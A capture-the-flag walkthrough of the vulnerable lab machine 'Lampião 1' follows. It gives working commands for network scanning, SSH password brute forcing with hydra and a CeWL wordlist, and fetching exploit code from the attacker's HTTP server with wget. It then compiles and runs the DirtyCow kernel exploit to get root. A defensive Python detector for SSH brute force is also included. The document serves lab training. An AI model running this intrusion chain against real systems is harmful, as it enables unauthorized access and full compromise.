Would you like to keep hacking in your own lab? Try this brand new vulnerable machine, “Lampião 1”. Get root! This was a great machine, as I learnt about a new Linux vulnerability, DirtyCow. Based on my experience, getting the first foothold was easy, but escalating privileges was slightly more tricky as it involved testing out a few different CVEs. Some research helped me identify which one to use; at the end of the day it is experience with privesc that helps the most.
Author: Tiago Tavares
Set up the machine with a host-only adapter and run an nmap ping sweep to discover all the hosts on the host-only network. On my main OS (Kali Linux) the interface eth1 is the host-only adapter.
nmap -sn 192.168.54.1/24
We identify the machine at 192.168.54.6, so we scan it for open ports with nmap (SYN scan of all ports with version and OS detection), saving the normal output to a file named “nmap”:
nmap -sS -p- -A -oN nmap 192.168.54.6
We see port 80 open, so let’s visit it in the browser. This is the webpage:
There doesn’t seem to be much here, so I visit port 1898 in the browser instead:
According to the nmap results there were quite a few entries in robots.txt. I’ll run a dirb scan to enumerate all the paths:
First, I’ll visit the robots.txt:
The above is a snippet showing just the Disallow entries. I first visited the changelog.txt path:
We can identify a service and version number:
This is worth noting in case we need to find any vulnerabilities.
I also wanted to note the potential username “tiago” that I found in one of the posts:
The URL was worth investigating as well. I tried manually navigating to another post using the URL. I changed ?q=node/1 to ?q=node/2:
Another possible user, “Eder”, is highlighted in the screenshot above. There is also a node 3, but it contains no new information.
I couldn’t find much more information on this machine’s web pages, so I decided to go straight to brute forcing. There are two possible entry points: SSH (identified by our port scan) and the website login (no admin login page was found).
Let’s try brute forcing the SSH login. First, create a wordlist (users.txt) containing the two usernames found:
I will use the following hydra command:
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 192.168.54.6 -t 4 ssh
-L specifies the username wordlist, -P specifies the password wordlist and -t 4 runs four login attempts in parallel.
The hydra run with rockyou.txt took too long, so I wanted to make my own wordlist, especially as this seems to be a Portuguese web server. The post at ?q=node/1 had a lot of words, so I used a tool called CeWL to crawl that page and create a wordlist for the brute force. The command is:
cewl http://192.168.54.6:1898/?q=node/1 --write passwords.txt
These are the first few lines of the wordlist we have just created:
Let’s execute the hydra command again but with this new password list:
hydra -L users.txt -P passwords.txt 192.168.54.6 -t 4 ssh
Hydra returns a valid pair of credentials: tiago:Virgulino
Let’s use this to connect via SSH:
ssh tiago@192.168.54.6
Enter the password Virgulino when prompted.
We have successfully logged in as user tiago. Nice :)
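From the defender’s side, the password guessing above and the login that follows it both land in the SSH server’s auth log. As an added example (not part of the original walkthrough), here is a small Python detector run over a constructed auth.log excerpt: it flags a source address that accumulates five failed password attempts within a minute and records which account a later successful login from that same address used. The host name, PIDs, ports and timestamps in the sample are made up.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log excerpt (not from the original post): a hydra-style run
# against the two discovered user names ending in a successful login, then one ordinary
# mistyped-then-correct login from a different host.
SAMPLE_LOG = """\
Jul 10 14:02:01 lampiao sshd[1201]: Failed password for tiago from 192.168.54.4 port 50211 ssh2
Jul 10 14:02:01 lampiao sshd[1202]: Failed password for invalid user Eder from 192.168.54.4 port 50212 ssh2
Jul 10 14:02:02 lampiao sshd[1203]: Failed password for tiago from 192.168.54.4 port 50213 ssh2
Jul 10 14:02:02 lampiao sshd[1204]: Failed password for invalid user Eder from 192.168.54.4 port 50214 ssh2
Jul 10 14:02:03 lampiao sshd[1205]: Failed password for tiago from 192.168.54.4 port 50215 ssh2
Jul 10 14:02:04 lampiao sshd[1206]: Accepted password for tiago from 192.168.54.4 port 50216 ssh2
Jul 10 14:30:00 lampiao sshd[1300]: Failed password for tiago from 192.168.54.9 port 40001 ssh2
Jul 10 14:31:00 lampiao sshd[1301]: Accepted password for tiago from 192.168.54.9 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect_ssh_bruteforce(log_text, threshold=5, window_seconds=60):
    """Map source IP -> alert for IPs with `threshold` failed logins inside any
    `window_seconds` span, naming the account if that IP then logged in."""
    recent = defaultdict(list)   # ip -> failure timestamps inside the window
    total = defaultdict(int)     # ip -> all failures seen
    users = defaultdict(set)     # ip -> user names targeted
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        user, ip = m["user"], m["ip"]
        if m["outcome"] == "Failed":
            total[ip] += 1
            users[ip].add(user)
            # slide the window: drop failures older than window_seconds
            recent[ip] = [t for t in recent[ip] if (ts - t).total_seconds() <= window_seconds]
            recent[ip].append(ts)
            if len(recent[ip]) >= threshold:
                alerts.setdefault(ip, {"compromised_user": None})
        elif ip in alerts:
            # a success from an already-flagged IP means the password was guessed
            alerts[ip]["compromised_user"] = user
    for ip, alert in alerts.items():
        alert["failures"], alert["users"] = total[ip], sorted(users[ip])
    return alerts
```

The single failure from 192.168.54.9 never reaches the threshold, so only the guessing host is reported, together with the account it eventually got into.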
For this machine I will use a script to identify possible vulnerabilities on the system: Linux Exploit Suggester (linux-exploit-suggester.sh), which I recommend for Linux machines:
Let’s download it onto our local machine first:
Start a HTTP server so we can transfer it onto the victim machine:
python -m SimpleHTTPServer 8080
Now let’s transfer the file into the victim’s /tmp directory from our SSH shell:
cd /tmp
wget http://192.168.54.4:8080/linux-exploit-suggester.sh
Make it executable and run it:
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
The output is a list of possible exploits. I will use this one in particular:
It is called DirtyCow because of a race condition in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.
The suggester output gives a download link, but the file is no longer hosted there. Use this website for the script instead:
As we did before, download the script onto your local machine and start a simple HTTP server:
wget https://www.exploit-db.com/raw/40847
python -m SimpleHTTPServer 8080
Now transfer the file into the /tmp directory of the victim machine and give it a .cpp extension:
wget http://192.168.54.4:8080/40847
mv 40847 40847.cpp
Now that we have our script 40847.cpp ready, let’s compile it:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
We now need to run “dcow”:
The exploit reports that the root password has been changed to dirtyCowFun. Let’s switch to root:
su root
Enter dirtyCowFun when prompted for the password.
We are now logged in as root!
id
cd /root
cat flag.txt